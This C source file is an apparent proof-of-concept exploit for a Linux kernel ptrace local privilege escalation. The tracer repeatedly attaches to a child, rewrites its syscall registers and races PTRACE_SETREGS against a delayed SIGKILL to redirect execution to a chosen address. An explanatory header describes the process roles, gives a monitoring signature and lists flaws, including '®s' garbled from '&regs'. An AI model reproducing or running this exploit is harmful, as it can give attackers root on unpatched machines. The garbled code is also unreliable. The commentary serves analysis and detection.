/*
 * One round of the tracer/tracee race.
 *
 * In practice this never returns to its caller: the tracee branch spins
 * forever and the tracer branch ends in exit(0).  The function is declared
 * int but has no return statement, so its value must not be used (main()
 * ignores it).
 *
 * Process roles, as visible in the code below:
 *   - the calling process pins itself to CPU 0 and forks the tracee;
 *   - the tracee ("V", presumably "victim") loops issuing syscall 0x6d
 *     (ptrace on x86-64) with every callee-saved register set to 0x1eadbeef;
 *   - the parent ("P") attaches with PTRACE_ATTACH, moves itself off CPU 0,
 *     stops the tracee at syscall entry, rewrites orig_rax to 0x3c (exit on
 *     x86-64), forks a helper ("K") that SIGKILLs the tracee after 120 ms,
 *     and writes the register set back with PTRACE_SETREGS.
 * Whether SETREGS wins against the SIGKILL depends on scheduling; "+" / "-"
 * report the SETREGS result and "." that the helper fired.
 *
 * From a monitoring standpoint the observable pattern is a tight fork loop
 * with PTRACE_ATTACH on a child, CPU-affinity changes, and SIGKILL of the
 * tracee from a third process.
 *
 * Depends on nuke_cpu() and on the ptrace/sched/wait headers from elsewhere
 * in the file.
 *
 * Code-quality notes (left unchanged here):
 *   - every ptrace()/sched_setaffinity() call is wrapped in assert(), so
 *     under NDEBUG the calls themselves are compiled out;
 *   - "®s" is HTML-entity garbling of the address-of expression "&regs"
 *     in the original page;
 *   - the inline asm writes rbp, r13, r14 and r15 but declares only rbx and
 *     r12 as clobbers, so the compiler is not told those are modified;
 *   - the ptrace() calls with five arguments pass one more than the API's
 *     (request, pid, addr, data); the extra value is ignored.
 */
int once()
{
    long i;                 /* unused */
    int pid0;               /* unused */
    int pid;                /* tracee pid in the parent, 0 in the tracee */
    unsigned long mask = 1; /* CPU 0 only; an unsigned long is passed where
                               sched_setaffinity expects a cpu_set_t */
    struct user_regs_struct regs;
    assert(!sched_setaffinity(0, sizeof(mask), &mask));
    pid = fork();
    if (!pid) {
        /* V: the tracee, inherits the CPU 0 affinity set above */
        while (1) {
            /* Put our chosen RIP in callee saved registers */
            asm __volatile__ (
            "mov $0x1eadbeef, %%rbx\n"
            "mov $0x1eadbeef, %%rbp\n"
            "mov $0x1eadbeef, %%r12\n"
            "mov $0x1eadbeef, %%r13\n"
            "mov $0x1eadbeef, %%r14\n"
            "mov $0x1eadbeef, %%r15\n"
            "mov $0, %%rsi\n"
            "mov $0, %%rdi\n"
            "mov $0x6d, %%rax\n"            /* 0x6d = 101 = ptrace on x86-64 */
            "syscall":::"rax","rsi","rdi",
            "r12", "rbx");                  /* rbp, r13-r15 not declared clobbered */
        }
    } else {
        /* P: the tracer */
        assert(!ptrace(PTRACE_ATTACH, pid, 0, 0));
        wait(NULL);                         /* attach stop; status not checked */
        assert(!ptrace(PTRACE_SETOPTIONS, pid, NULL,
        PTRACE_O_TRACESYSGOOD |
        PTRACE_O_TRACEFORK |
        PTRACE_O_TRACEVFORK |
        PTRACE_O_TRACECLONE));
        while(1) {
            int nuke_pid;   /* pid returned by nuke_cpu(); defined elsewhere */
            int pid2;       /* pid of the killer helper */
            /* 0xfffe = CPUs 1..15: keep the tracer off the tracee's CPU 0 */
            mask = 0xfffe;
            assert(!sched_setaffinity(0, sizeof(mask), &mask));
            /*Entry */
            assert(!ptrace(PTRACE_SYSCALL, pid, NULL, 0, 0));
            wait(NULL);                     /* syscall-entry stop; status not checked */
            assert(!ptrace(PTRACE_GETREGS, pid, NULL, ®s));
            nuke_pid = nuke_cpu();
            regs.orig_rax = 0x3c;           /* 0x3c = 60 = exit on x86-64 */
            pid2 = fork();
            if (!pid2) {
                /* K: after 120 ms, SIGKILL the tracee and report with "." */
                usleep(120000);
                kill(pid, SIGKILL);
                printf(".");
                fflush(stdout);
                exit(0);
            }
            printf("{");
            fflush(stdout);
            /* "+" if the register write-back was accepted, "-" otherwise */
            if (!ptrace(PTRACE_SETREGS, pid, NULL, ®s)) {
                printf("+");
            } else {
                printf("-");
            }
            /* data is 0 here: the trailing SIGKILL is a fifth argument and is
               ignored by ptrace(); the kill() below is what terminates the
               tracee */
            ptrace(PTRACE_CONT, pid, NULL, 0, SIGKILL);
            kill(pid, SIGKILL);
            kill(pid2, SIGKILL);
            kill(nuke_pid, SIGKILL);
            exit(0);                        /* the tracer never loops again */
        }
    }
}
/*
 * Driver: fork a child that runs once(), reap it, repeat forever.
 * Never returns.  The reaped child is whichever process once() leaves for
 * the parent; the return value of fork() is not checked for -1.
 */
int main(void)
{
    for (;;) {
        int child = fork();
        if (child == 0)
            once();
        wait(NULL);
    }
}
Linux Kernel ptrace 功能本地权限提升漏洞(CVE(2)